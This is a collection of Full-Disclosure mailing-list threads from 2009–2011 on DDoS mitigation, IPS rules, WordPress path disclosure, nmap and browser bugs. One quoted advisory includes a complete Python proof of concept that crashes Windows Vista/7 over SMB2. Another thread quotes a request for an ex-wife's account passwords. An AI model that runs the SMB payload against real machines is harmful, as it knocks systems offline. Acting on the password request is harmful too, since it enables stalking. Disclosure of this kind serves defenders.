Re: [Full-disclosure] You a trollin'
Yes you are trolling... On Mon, Jul 4, 2011 at 12:27 PM, t0hitsugu tohits...@gmail.com wrote: Am I right? ;D ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.theboxery.com -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sony: No firewall and no patches
Most security certifications are a mockery of entire industry. On Mon, May 9, 2011 at 7:33 PM, Ivan . ivan...@gmail.com wrote: I guess that makes a mockery of the PCI DSS framework! On Tue, May 10, 2011 at 9:03 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: Maybe they should call that You don't have to patch genius! Lol http://www.eweek.com/c/a/Security/Sony-Networks-Lacked-Firewall-Ran-Obsolete-Software-Testimony-103450/ Sent from my Windows Phone ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubisoft DDoS
I don't see why they didn't just block the attack. It must be more then this. On Tue, Mar 9, 2010 at 8:21 AM, Dobbins, Roland rdobb...@arbor.net wrote: On Mar 9, 2010, at 11:01 PM, valdis.kletni...@vt.edu wrote: Oh, I didn't say they didn't exist. A good way to get started w/scalable DDoS mitigation is to implement S/RTBH on one's hardware-based edge routers, and then make use of open-source NetFlow tools for visibility. There are commercial solutions as well - in the interests of full disclosure (pardon the pun, heh), I work for a vendor of such intelligent DDoS mitigation (IDMS) solutions. These slides may be of interest in hardening/leveraging one's network infrastructure and gaining the ability to detect/classify/traceback/mitigate DDoS: http://files.me.com/roland.dobbins/k54qkv http://files.me.com/roland.dobbins/prguob http://files.me.com/roland.dobbins/k4zw3x http://files.me.com/roland.dobbins/dweagy There was also a relevant talk at the latest NANOG (a synopsis of discussions on nanog-l and cisco-nsp): http://www.nanog.org/meetings/nanog48/presentations/Monday/Kaeo_FilterTrend_ISPSec_N48.pdf and other relevant presentations at various NANOGs in the past. To answer the previous respondent's question, Cisco acquired Riverhead and its Guard in early 2004: http://www.cisco.com/en/US/prod/collateral/modules/ps2706/end_of_life_c51-573493.html I also highly recommend this book by Dave Smith and Gregg Schudel of Cisco - it's the best (and only!) book on real-world opsec out there, available in dead-tree, Kindle, and Adobe Reader formats: http://www.amazon.com/Router-Security-Strategies-Securing-Network/dp/1587053365/ref=sr_1_1?ie=UTF8s=booksqid=1262667257sr=8-1 [Full disclosure again; I'm cited in the book, but received and continue to receive no renumeration of any kind due to same.] But before going the commercial route, folks should work on hardening their hosts/OSes/apps and leveraging their existing infrastructure and open-source as noted in the presentations above - in many cases, this is all that's needed, as outlined here: http://mailman.nanog.org/pipermail/nanog/2010-January/016747.html --- Roland Dobbins rdobb...@arbor.net // http://www.arbornetworks.com Injustice is relatively easy to bear; what stings is justice. -- H.L. Mencken ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.miami-criminallaw.com/practice-areas/cyber-crimes -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Going underground, living out of backpack, etc?
I guess you can follow what he did http://amix.dk/blog/post/19493 . I just want you to know that unless you leave the country it's going to be hard to get off big brothers radar. On Mon, Mar 8, 2010 at 12:40 AM, Anders Klixbull a...@experian.dk wrote: Learn how to blow old men and live on their couches -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Simon Garfinkle Sent: 1. marts 2010 05:50 To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Going underground, living out of backpack, etc? -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hello. I am interested in getting some advice from you security professionals (white hat and black hat) about going underground. I am sick of big brother, I love independence, I was to experience the world and have no commitments. I am just sick of being held down in one place. It's too easy for people to harass and stalk you. You gotta be mobile. Fancy free and foot loose. You gotta be underground. Have any advice for living out of a bag? Any stories? Any lessons? -BEGIN PGP SIGNATURE- Charset: UTF8 Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 3.0 wpwEAQMCAAYFAkuLR3UACgkQRQnwIcxK0rKdJwP9Fbv4ENsN+ouzbn34owsypykpL00+ E1qCZBwZGD4EJ5QK6PKdyR3kc33hOOasqaWn+HQVX1OtdKa/bXwWCJw3b3bEbImPHHoM FSfO7mJsrifYsufZcXtgRgFOI3KA7W+cN1DHncawcBf5/7CNKrjXSVi2NewLsp7beFlM gJrMvYw= =ii33 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.miami-criminallaw.com/practice-areas/cyber-crimes -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Two MSIE 6.0/7.0 NULL pointer crashes
Why doesn't microsoft throw some of it's weight behind Mozilla and ditch IE forever. It doesn't suit their image. On Wed, Jan 20, 2010 at 6:30 AM, Christian Sciberras uuf6...@gmail.comwrote: On my IE6 this doesn't work (crash), but it does on IE7. I'm on WinXP Pro SP3 DEP+. On Wed, Jan 20, 2010 at 11:57 AM, Berend-Jan Wever berendjanwe...@gmail.com wrote: Two NULL pointer crashes, they do not affect MSIE 8.0. Repros can be found here: http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/ Cheers, SkyLined http://skypher.com/index.php/2010/01/20/microsoft-internet-explorer-6-07-0-null-pointer-crashes/ Berend-Jan Wever berendjanwe...@gmail.com http://skypher.com/SkyLined ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.astorandblack.com -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] All China, All The Time
They used an IE exploit to get in. I don't understand Google said that they used a complex way to access their systems. AFAIK many home users are hacked daily the same way On Thu, Jan 14, 2010 at 7:44 PM, Ivan . ivan...@gmail.com wrote: Interesting article on zdnet, talking about the targeting of the lawful intercept system at Google …they [hackers] apparently were able to access a system used to help Google comply with search warrants by providing data on Google users, said a source familiar with the situation, who spoke on condition of anonymity because he was not authorized to speak with the press. “Right before Christmas, it was, ‘Holy s***, this malware is accessing the internal intercept [systems],’” he said. http://blogs.zdnet.com/Foremski/?p=1047 2010/1/15 Michael Holstein michael.holst...@csuohio.edu: With all the hubbub around China yet again, I would like to remind you of the utilities available at Hammer of God that allow one to completely block any or all traffic to or from China or any other country in the world via ISA/TMG. Source for pre-built blocklists in DNSBL, CIDR, or Cisco ACL format : http://www.okean.com/thegoods.html Regards, Michael Holstein Cleveland State University ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Security app
What I found to be very helpful was looking at the iPhone-dev teams's presentation about the jailbreak and then asking some questions in the chat room. On Tue, Jan 5, 2010 at 4:18 PM, Christian Sciberras uuf6...@gmail.comwrote: Depending on what you are aiming at. In general, I'd love to see an information listing app, of course of security-related information (connections, sensors...). On Tue, Jan 5, 2010 at 9:44 PM, Will McAfee sec-commun...@thegoodhacker.com wrote: I am an iPhone app developer working on a security toolkit app. My question is simple. What would you find most useful in a security tool app? Sent from my iPhone ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.miami-criminallaw.com/practice-areas/cyber-crimes -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Game
We should make it an iPhone app. I lost the game as well a while ago... On Thu, Dec 31, 2009 at 12:14 AM, Andrew Haninger ahan...@mindspring.comwrote: On Wed, Dec 30, 2009 at 8:48 AM, McGhee, Eddie eddie.mcg...@ncr.com wrote: Care to elaborate? NSFW - http://encyclopediadramatica.com/The_game Andy ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.miami-criminallaw.com/practice-areas/cyber-crimes -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DECAF patched and re-enabled
No it's florescent On Fri, Dec 25, 2009 at 11:25 AM, Christian Sciberras uuf6...@gmail.comwrote: Won't the bulb burn up turning it on and off repeatedly? Just kiddin' On Thu, Dec 24, 2009 at 7:16 PM, thediskprotec...@hush.com wrote: DECAF was disabled days ago by the authors at decafme.org. It looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone home functionality. The full story is at http://www.soldierx.com/news/DECAF-hacked-and-re- enabled-SXhttp://www.soldierx.com/news/DECAF-hacked-and-re-%0Aenabled-SXand the files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.miami-criminallaw.com/practice-areas/cyber-crimes -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DECAF patched and re-enabled 133-54D
On Sun, Dec 27, 2009 at 2:26 AM, James Matthews nytrok...@gmail.com wrote: No it's florescent On Fri, Dec 25, 2009 at 11:25 AM, Christian Sciberras uuf6...@gmail.comwrote: Won't the bulb burn up turning it on and off repeatedly? Just kiddin' On Thu, Dec 24, 2009 at 7:16 PM, thediskprotec...@hush.com wrote: DECAF was disabled days ago by the authors at decafme.org. It looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone home functionality. The full story is at http://www.soldierx.com/news/DECAF-hacked-and-re- enabled-SXhttp://www.soldierx.com/news/DECAF-hacked-and-re-%0Aenabled-SXand the files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.miami-criminallaw.com/practice-areas/cyber-crimes -- -- http://www.goldwatches.com -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Software developer looks at CRU code
This is sad and I feel bad that people have been sold on these ideas. On Sun, Nov 29, 2009 at 5:28 PM, Ivan . ivan...@gmail.com wrote: http://www.youtube.com/watch?v=sYxk7pnmMFwfeature=related ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com -- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Attack pattern selection criteria for IPS products
Yes they do all look at the same common holes and flag them but as for
detection everyone has a different method.
On Fri, Oct 9, 2009 at 1:16 PM, Rohit Patnaik quanti...@gmail.com wrote:
Why would Cisco, Juniper, etc. maintain the signature sets?
Presumably, each company maintains its own set of allow/deny rules.
--Rohit Patnaik
2009/10/9 srujan sruja...@gmail.com:
I agree with your word let customer network admin selects it. But
Tipping Point, Juniper, Cisco and Snort will have a wide range of customers,
and maintaining different signature set for different Orgs is a big
headache.
All these guys are maintaining 95% to 99% detection coverage at NSS
testing. That's why i asked about the selection criteria.
On Fri, Oct 9, 2009 at 1:36 AM, valdis.kletni...@vt.edu wrote:
On Fri, 09 Oct 2009 00:47:24 +0530, srujan said:
What is the vulnerability selection criteria of Tipping Point, Juniper
IPS
products.
Is it covering each and every CVE ID or is it selecting particular
kind of
attacks. If so what is selection criteria (cvss score or severity
level or
most publicly exploited)
If the answer isn't customer network admin selects it, the products
are
broken and brain damaged. Different sites have different security
stances,
and different opinions regarding the trade-off between the added
security
benefit and the throughput and latency hits you take.
Even within a site, the trade-offs may vary. I have some machines that
are actually air-gapped, some that are heavily firewalled, and some that
are lightly firewalled - and there's probably some Snort sensors and
honeypots
too.. ;)
If you're asking for what pre-canned detection rules they come with,
it's
probably all the known vulns that we can figure out how to write a
Snort
rule that doesn't suck resources. :)
OK, maybe they don't use Snort - but the same problems of filter
expressiveness, whether/how to do a regexp, and so on, are faced by all
IDS/IPS
systems. If you need to do a regexp backref, it's going to either not
be part
of the available toolset, or it's going to suck at line rate on high
speed
interfaces. Matching '\((134|934){3,5})\(foo|bar)(more ugly)(\1|\2)' is
going
to suck whether it's Snort or silicon.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
http://www.goldwatches.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] When is it valid to claim that a vulnerability leads to a remote attack?
If you classify a remote bug (anything that can be exploited remotely) then you are classifying all bugs (you can use a privilege escalation exploit remotely) I agree with Thor, anything that exploits a remote service (HTTP,FTP Etc..) without any user interaction. On Sun, Oct 11, 2009 at 12:54 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: I think we can agree that yes, it is remotely exploitable and as such should be categorized as remote in Risk/Impactt scoring systems ? Does anybody disagree ? I'd be interested to hear your point of view. Hey Thierry - I hope all is well... I'm happy to include user assisted remote exploitation as a remote vulnerability in academic conversations, but I don't categorize it as remote when assessing overall risk to a particular threat in production environments. Like everyone else, my TMs include impact and skill required to exploit a particular vulnerability; but they also include likelihood of exploitation. While that may sound like a wildcard metric, I quantify it by applying the internal controls in place that may mitigate a particular attack. In my networks (networks I control, design, or consult for) most users couldn't execute [common] exploits even if they wanted to. I won't bore you with the controls I deploy as I'm confident you are well aware of the options one has, but the fact they exist at all place user assisted remote exploits in a different category for me when assessing risk. When the propensity for a vulnerability to be exploited lies in a particular user's response to any given trigger, as opposed to any authoritative in-place controls to mitigate exposure, then a model's relevant response options are greatly diminished (IMO). As such, I choose to categorize remote exploits as those that may be executed against a given host that is autonomously running a [vulnerable] service that can be connected to by some (any) other network client, device, or service for the purposes of ascertaining overall risk. t ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full Path Disclosure in most wordpress' plugins [?]
Some shared hosting services try very hard (and do quite well with what they
have). When you get into VPS systems it gets complex but dedicated is a nice
way to go.
James
On Wed, Sep 30, 2009 at 3:57 AM, Glafkos Charalambous
i...@infosec.org.ukwrote:
Hello,
Most of the people are using shared hosting environment and not all of them
are about security and/or having their own (dedicated) server. You have to
see it from the whole prospective and that this is *not always* an option.
I don't remember this post was about secure environments or how to have a
secure website rather than the issue of wordpress plugins and how people are
affected (using shared hosting or not)
Btw what part of *most of the times* didn't make sense in the previous
post?
Glafkos
*From:* majinboo [mailto:majin...@gmail.com]
*Sent:* Wednesday, September 30, 2009 9:35 AM
*To:* Glafkos Charalambous
*Cc:* Peter Bruderer; full-disclosure@lists.grok.org.uk
*Subject:* Re: [Full-disclosure] Full Path Disclosure in most wordpress'
plugins [?]
Hello,
shared hosting environnement is not an option if you want to have a secure
website.
majinboo
2009/9/29 Glafkos Charalambous i...@infosec.org.uk
Hello,
Yes at some point you are right but this is not an option most of the
times,
especially when you are on a shared hosting environment.
So either the developers need to secure their plugins or we do it ourselves
as this is still an issue for everybody using Wordpress Plugins.
Glafkos
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Peter
Bruderer
Sent: Tuesday, September 29, 2009 9:33 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Full Path Disclosure in most wordpress'
plugins [?]
The proposed fix is definitely something that helps. But to me it
looks like most people do not care anymore about server settings. As
soon as it is kind of working, it is pushed to the Internet.
Why not avoid these problems completely and follow the recommendations
in php.ini?
; Print out errors (as a part of the output). For production web sites,
; you're strongly encouraged to turn this feature off, and use error
logging
; instead (see below). Keeping display_errors enabled on a production
web site
; may reveal security information to end users, such as file paths on
your Web
; server, your database schema or other information.
;
; possible values for display_errors:
;
; Off- Do not display any errors
; stderr - Display errors to STDERR (affects only CGI/CLI binaries!)
; stdout (On) - Display errors to STDOUT
;
display_errors = Off
; Even when display_errors is on, errors that occur during PHP's startup
; sequence are not displayed. It's strongly recommended to keep
; display_startup_errors off, except for when debugging.
display_startup_errors = Off
; Log errors into a log file (server-specific log, stderr, or
error_log (below))
; As stated above, you're strongly advised to use error logging in
place of
; error displaying on production web sites.
log_errors = On
Now the error message is in the logfile and nothing is displayed in
the browser.
Peter Bruderer
--
Bruderer Research GmbH
CH-8200 Schaffhausen
On 29.09.2009, at 18:31, Loaden wrote:
Hey
at first excuse my bad english. Thats a nice fix. But you need to
change
the code for other plugins or files. This code works for all files
which
should not be loaded directly:
if (basename($_SERVER['SCRIPT_NAME']) == basename(__FILE__))
exit('Please do not load this page directly');
If your webhoster don't have a configuration panel you can try to
disable errors with this in your index.php:
ini_set('display_errors', 0);
I'am no sure if it works if save mode is activated. Try it or look at
the PHP manual.
Regards
Loaden
On Mo, 2009-09-28 at 23:37 +0300, Glafkos Charalambous wrote:
Hello,
That definitely can be fixed easily with two lines of code but is
still something that should have been prevented at earlier stages of
plugin development
if (!empty($_SERVER['SCRIPT_FILENAME']) 'akismet.php' ==
basename($_SERVER['SCRIPT_FILENAME']))
die ('Please do not load this page directly');
From the server side you can set PHP warning and errors OFF
either
through php.ini or PHP page itself but sometimes that's not an option
Regards,
Glafkos Charalambous
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
So Msoft! why can't they just stop reintroducing bugs?
On Wed, Sep 9, 2009 at 11:04 AM, random...@hushmail.com wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
How come all I hear about is n3td3v, and I see noone crying out
lout about this :
http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta
sk=showaction=viewid=64Itemid=15http://www.reversemode.com/index.php?option=com_mamblogItemid=15ta%0Ask=showaction=viewid=64Itemid=15
is fd all 'bout trolls nao?
- --
=
- - Release date: September 7th, 2009
- - Discovered by: Laurent Gaffié
- - Severity: Medium/High
=
I. VULNERABILITY
- -
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
II. BACKGROUND
- -
Windows vista and newer Windows comes with a new SMB version named
SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0
for more details.
III. DESCRIPTION
- -
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE
PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send
to a SMB server, and it's used
to identify the SMB dialect that will be used for futher
communication.
IV. PROOF OF CONCEPT
- -
Smb-Bsod.py:
#!/usr/bin/python
# When SMB2.0 recieve a char in the Process Id High SMB
header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA
from socket import socket
from time import sleep
host = IP_ADDR, 445
buff = (
\x00\x00\x00\x90 # Begin SMB header: Session message
\xff\x53\x4d\x42 # Server Component: SMB
\x72\x00\x00\x00 # Negociate Protocol
\x00\x18\x53\xc8 # Operation 0x18 sub 0xc853
\x00\x26# Process ID High: -- :) normal value should be
\x00\x00
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe
\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54
\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31
\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00
\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57
\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61
\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c
\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c
\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e
\x30\x30\x32\x00
)
s = socket()
s.connect(host)
s.send(buff)
s.close()
V. BUSINESS IMPACT
- -
An attacker can remotly crash without no user interaction, any
Vista/Windows 7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.
VI. SYSTEMS AFFECTED
- -
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly
Win Server 2008
as it use the same SMB2.0 driver (not tested).
VII. SOLUTION
- -
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.
VIII. REFERENCES
- -
http://microsoft.com
IX. CREDITS
- -
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/
X. LEGAL NOTICES
- -
The information contained within this advisory is supplied as-is
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0
wpwEAQMCAAYFAkqnw/YACgkQRVBSp0SbIgeyMQQAoyMwFvi4CWq+2XUcoyIQUp/MxwBr
mUbXX+BJYl6K9ydQqZDxnAwOi24VIBE/xRQcUFMhVH/Uk4zH9KAGzW7/gu3V8Yq0mHPL
pCZ9+Lwml3mNeJOg6oZEyJUhmJTF2WcfXLnmjHbys0oShACWCXBAyqyMVQFdNSja9aeC
6kWcu5Q=
=MjSD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
http://www.jewelerslounge.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] nmap
Nmap is written in C and C++ and the GUI has python bindings. 2009/7/30 Sándor Levente zer...@gmail.com hey list! i have a simple question: if nmap is python-based, why can't it be downloaded in python but c++? maybe lame question but the only programming language i know is python. thanks! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] (no subject)
LAMO! This is amazing! It made my day! You stupid stalker get a life and stay away from women! James On Wed, Jul 1, 2009 at 3:06 PM, Inbox (Main) rokade...@gmail.com wrote: Why not just ask michelle? Hope you don't mind: I forwarded your mail to michelle.nash2...@yahoo.com 2009/7/1 mitch nash mtchn...@yahoo.com would like passwords for e mail, facebook, and my space for michelle.nash2...@yahoo.com, and my space passwords for marlee_michelle. (x wife and daughter) thank you, mitch nash ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] lostzero has invited you to Spokeo
Stalker. One of the sites that helps you spy on people around you through social networks etc... On Sun, Jun 21, 2009 at 12:46 AM, lostz...@gmail.com wrote: Hi full-disclosure, lostz...@gmail.com has invited you to try Spokeo, which finds your friends' updates across the Web. Your friends are already using Spokeo to follow you on Web Results. Try Spokeo today to find what your friends are doing across 30 different social networks! Click here to accept your invitationhttp://www.spokeo.com/public/join?c=7625472e72f41c3a7ac7326ddeefceab570c6662 -- This invitation was sent with lostzero's approval. If you wish to opt out of all future emails, click herehttp://www.spokeo.com/optout?c=f495048575348535649. Copyright © 2009 Spokeo, Inc. All rights reserved. 1685 Plymouth Street #200, Mountain View, CA 94043 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- http://www.goldwatches.com http://www.jewelerslounge.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iPhone Safari phone-auto-dial vulnerability (original date: Nov. 2008)
Bug or feature (old common argument within the software world) however I don't think that Automatic dialing is what I want when I am browsing a page. I would like a choice not for it to be done automatically. On Thu, Jun 18, 2009 at 8:29 PM, Collin Mulliner col...@betaversion.netwrote: Mike, just getting to the phone dialer is not a bug! That is what the tel: protocol is for. All most all mobile phones implement this, every time you open a tel: URL you will get to the dialer in some way. Collin Mike Ely wrote: Confirmed on the T-Mobile G1 email app running OS version 1.5. Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;) FWIW, it didn't actually dial, just loaded the dialer with that number ready. Looks like this is a Webkit bug, not Safari. Collin Mulliner col...@betaversion.net wrote: Released since Apple published the iPhone 3.0 security fixes. Vulnerability Report --- BEGIN ADVISORY --- Manufacturer: Apple (www.apple.com) Device: iPhone 3G (iPhone 1st Gen) Firmware: 2.1 (possible earlier versions) Device Type: smart phone Subsystems: Safari (and mobile telephony) - Short name: iPhone Safari phone-auto-dial (vulnerability) Vulnerability class: application logic bug Executive Summary: A malicious website can initiate a phone call without the need of user interaction. The destination phone number is chosen by the attacker. Risk: MEDIUM-HIGH Medium to high risk due to the possibility of financial gain through this attack by calling of premium rate numbers (e.g. 1-900 in the U.S.). Denial-of-service against arbitrary phone numbers through mass-calling. User cannot prevent attack. - Reporter: Collin Mulliner collin[AT]mulliner.org - Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT) - Time line: Oct. 20. 2008: Reported vulnerability to vendor. Oct. 20. 2008: Vendor acknowledges receiving our email. Not commenting on the vulnerability itself. Oct. 27. 2008: Sent update to vendor, also requesting a status report. Oct. 29. 2008: Reply from vendor acknowledging the vulnerability. Oct. 30. 2008: Sent additional information. Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS version. Nov. 20. 2008: Public disclosure. Jun. 18. 2009: Full-Disclosure. - Fix: iPhone OS 2.2 iPhone OS 2.2.1 iPhone OS 3.0 - Technical Details: The Safari version running on the iPhone supports handling the TEL [1] protocol through launching the telephony/dialer application. This is done by passing the provided phone number to the telephony application. Under normal conditions, loading a tel: URI results in a message box asking the user's permission to call the given number. The user is presented with the simple choice to either press call or cancel. A TEL URI can be opened automatically if the TEL URI is used as the source of an HTML iframe or frame, as the URL of a meta refresh, as the location of a HTTP 30X redirect, and as the location of the current or a new window using javascript. We discovered a security vulnerability that dismisses the ask for permission to call dialog in a way that chooses the call option rather than the cancel option. This condition occurs if a TEL URI is activated at the same time Safari is closed by launching an external application, for example launching the 